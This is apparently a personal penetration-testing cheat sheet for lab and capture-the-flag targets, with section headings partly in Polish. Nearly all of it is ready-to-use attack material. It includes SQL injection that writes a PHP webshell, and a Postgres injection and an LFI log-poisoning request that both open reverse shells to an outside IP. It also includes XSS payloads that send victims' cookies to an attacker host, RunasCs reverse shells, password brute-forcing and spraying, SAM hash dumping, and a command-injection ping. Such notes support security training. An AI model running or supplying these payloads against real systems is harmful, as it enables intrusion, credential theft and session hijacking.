rlwrap nc 192.168.221.220 4444


enumeracje smb
nmap --script smb-enum-shares.nse -p445 192.168.211.10

Smbclient //192.168.211.10/Users -N
_______________________
SMB Server:
impacket-smbserver files . -smb2support

impacket-smbserver -smb2support files . -user kali -password mypass
#Victim: Powershell
net use z: \\192.168.119.174\pub /user:kali mypass
net use z: \\192.168.119.174\pub
cp "File name.txt" z:


_______________________
RDP:
xfreerdp /v:192.168.197.196 /u:offsec /p:lab 
evil-winrm -i <target IP> -u Administrator -p <password>
impacket-psexec administrator@10.129.183.142   -> shell via SMB

iwr http://10.10.14.66:8000/RunasCs-master/RunasCs.exe -outfile c:\temp\runascs.exe
./RunasCs.exe mikasaAckerman IL0v3ErenY3ager powershell -r 10.10.14.66:9100


______________________

sql injection parametr w burp:
MYSQL:
mail-list=' union select null,null,null,null, "<?php system($_GET['cmd']);?>",null into outfile "/var/www/html/web.php" -- /

POSTGRES:
weight=120&height=130';  CREATE Table demo(t text)  ; COPY demo FROM PROGRAM 'nc 192.168.45.179 9001 -c bash'; -- /

____________________________________
LOG POSSOINIG
____________________________________
GET /meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log&cmd=bash+-c+"bash+-i+>%26+/dev/tcp/192.168.45.220/9001+0>%261" HTTP/1.1
Host: mountaindesserts.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36 <?php echo system($_GET['cmd']); ?>
Accept: 

GET /meteor/index.php?page=c:/xampp/apache/logs/access.log&cmd=type+hopefullynobodyfindsthisfilebecauseitssupersecret.txt HTTP/1.1


____________________________________
PASSWORD CRACK
____________________________________
sudo hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.50.201
sudo hydra -l nadine -P /usr/share/wordlists/rockyou.txt -s 3389 rdp://192.168.194.227
____________________________________
WP SCAN
____________________________________
wpscan --api-token apitoken212312 --update 
wpscan --url 192.168.212.47 --api-token apitoken212312 
____________________________________
joomla SCAN
____________________________________
joomscan -u http://dev.devvortex.htb/
look at:
http://dev.devvortex.htb/api/index.php/v1/config/application?public=true/
____________________________________
WINDOWS REMOTE SHELL
____________________________________
evil-winrm -i 192.168.50.220 -u daveadmin -p "qwertqwertqwert123\!\!"

____________________________________
WINDOWS Process
____________________________________
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'} | % {icacls $_.PathName}

____________________________________
PowerShell Pobieranie Plikow
____________________________________
python3 -m http.server 80
iwr -uri http://192.168.119.3/adduser.exe -Outfile adduser.exe

____________________________________
powershell -ep bypass


nmap -sV --script vuln  192.168.191.144 -p 80

____________________________________
git dumper
____________________________________
python git_dumper.py http://192.168.216.144/.git/ dumpe
cd dumpe                                                                                        
git show


curl http://192.168.45.223/linpeas.sh -O linpeas.sh
./linpeas.sh -a > linpeas_out.txt

zip2john sitebackup3.zip > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

NMAP UDP
sudo nmap -sU 192.168.248.145  
echo "version" | nc 192.168.238.143 3003
____________________________________
XSS
____________________________________
<img src=x onerror=fetch('http://10.10.14.108'+document.cookie);>
<script>var i=new Image(); i.src="http://10.10.14.123:8000/?cookie="+btoa(document.cookie);</script>

____________________________________
zmiana shella w linux
_____________________________________
chsh

____________________________________
Poprawa shella z revshella
____________________________________
python3 -c 'import pty; pty.spawn("/bin/bash")'
____________________________________

MONGODB Connect
mongo mongodb://10.129.228.30:27017
show dbs;
use sensitive_information;
show collections;
db.flag.find().pretty();
____________________________________
SPRAWDZANIE POŚWIADCZEŃ
crackmapexec smb 10.10.11.5 -u users.txt -p pass.txt



ssh -i id_rsa john@10.10.11.13
chmod 600 id_rsa
______________________________________
MOUNT DMP FILE
____________________________________-
┌──(milo㉿Kali2023)-[~/Downloads/memprocf]
└─$ ./memprocfs -device /home/milo/HTB/MEMORY.DMP -mount /home/milo/HTB/freelancer

┌──(milo㉿Kali2023)-[~]
└─$ impacket-secretsdump -sam /home/milo/HTB/freelancer/registry/hive_files/0xffffd3067d935000-SAM-MACHINE_SAM.reghive 
-system /home/milo/HTB/freelancer/registry/hive_files/0xffffd30679c46000-SYSTEM-MACHINE_SYSTEM.reghive -security 0xffffd3067d7f0000-SECURITY-MACHINE_SECURITY.reghive local 


snmpwalk -v 2c -c public 10.10.10.251
______________________________________
Decompile python.exe
____________________________________-
/home/milo/.local/bin/pydumpck python.exe -p pycdc


sudo tcpdump -ni tun0 icmp
photo=andrea-de-santis-uCFuP0Gc_MM-unsplash.jpg&filetype=jpg;ping+10.10.14.5&dimensions=30x20





